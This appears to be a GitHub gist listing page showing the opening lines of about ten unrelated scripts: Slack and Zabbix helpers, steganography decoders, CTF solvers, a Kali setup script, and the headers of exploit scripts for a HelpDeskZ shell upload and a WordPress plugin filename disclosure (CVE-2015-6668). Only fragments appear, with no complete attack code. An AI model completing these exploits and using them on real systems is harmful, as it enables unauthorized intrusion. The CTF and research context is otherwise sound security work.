This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import requests | |
import json | |
import argparse | |
import sys | |
conversationList = "https://slack.com/api/conversations.list" | |
postMessage = "https://slack.com/api/chat.postMessage" | |
fileUpload = "https://slack.com/api/files.upload" | |
apiKey = "key" | |
channelIDs = {"channel_name": "channel_id"} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from PIL import Image | |
import binascii | |
import string | |
def rgb2hex(r,g,b): | |
hex = "#{:02x}{:02x}{:02x}".format(r,g,b) | |
return str(hex) | |
im = Image.open('bojack.png') | |
print im | |
arr='' | |
pix_val = list(im.getdata()) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests,urllib2,re #for python3 replace urllib2 with urllib.request | |
from bs4 import BeautifulSoup | |
from subprocess import Popen,PIPE | |
URL="https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=" | |
cmd="wmic product get name,version" | |
subprocess.call(cmd.split(),shell=True) | |
p = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=PIPE) | |
output, err = p.communicate(b"input data that is passed to subprocess' stdin") | |
rc = p.returncode | |
st=output.decode() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import hashlib | |
import time | |
import sys | |
import requests | |
print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit' | |
if len(sys.argv) < 4: | |
print "Usage: {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0]) | |
sys.exit(1) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * #Using pwntools for connecting | |
import re | |
import textwrap | |
conn = remote('crypto.hsctf.com',8111) | |
conn.recvline() | |
conn.recvline() | |
conn.recvline() | |
s=conn.recvline() | |
print s | |
t="abcdefghijklmnopqrstuvwxyz1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ!?_" #list of characters for bruteforcing |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
export DEBIAN_FRONTEND=noninteractive; | |
echo "[*] Starting Install... [*]" | |
echo "[*] Upgrade installed packages to latest [*]" | |
echo -e "\nRunning a package upgrade...\n" | |
apt-get -qq update && apt-get -qq dist-upgrade -y | |
apt full-upgrade -y | |
apt-get autoclean | |
echo "[*] Install stuff I use all the time [*]" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
from pyzabbix import ZabbixAPI | |
import sys | |
import logging | |
stream = logging.StreamHandler(sys.stdout) | |
stream.setLevel(logging.DEBUG) | |
log = logging.getLogger('pyzabbix') | |
log.addHandler(stream) | |
log.setLevel(logging.DEBUG) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <string.h> | |
unsigned long hashcode = 0x21DD09EC; | |
unsigned long check_password(const char* p){ | |
int* ip = (int*)p; | |
int i; | |
int res=0; | |
for(i=0; i<5; i++){ | |
res += ip[i]; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
print """ | |
CVE-2015-6668 | |
Title: CV filename disclosure on Job-Manager WP Plugin | |
Author: Evangelos Mourikis | |
Blog: https://vagmour.eu | |
Plugin URL: http://www.wp-jobmanager.com | |
Versions: <=0.7.25 | |
""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from PIL import Image | |
import binascii | |
im = Image.open('pic.png') | |
pix_val = list(im.getdata()) | |
# print pix_val | |
lsbs="" | |
for idx,val in enumerate(pix_val): | |
# Converting each rgb values into binary and keeping only the Least Significant Bit | |
lsbs=lsbs+'{0:08b}'.format(val[0])[-1] | |
lsbs=lsbs+'{0:08b}'.format(val[1])[-1] |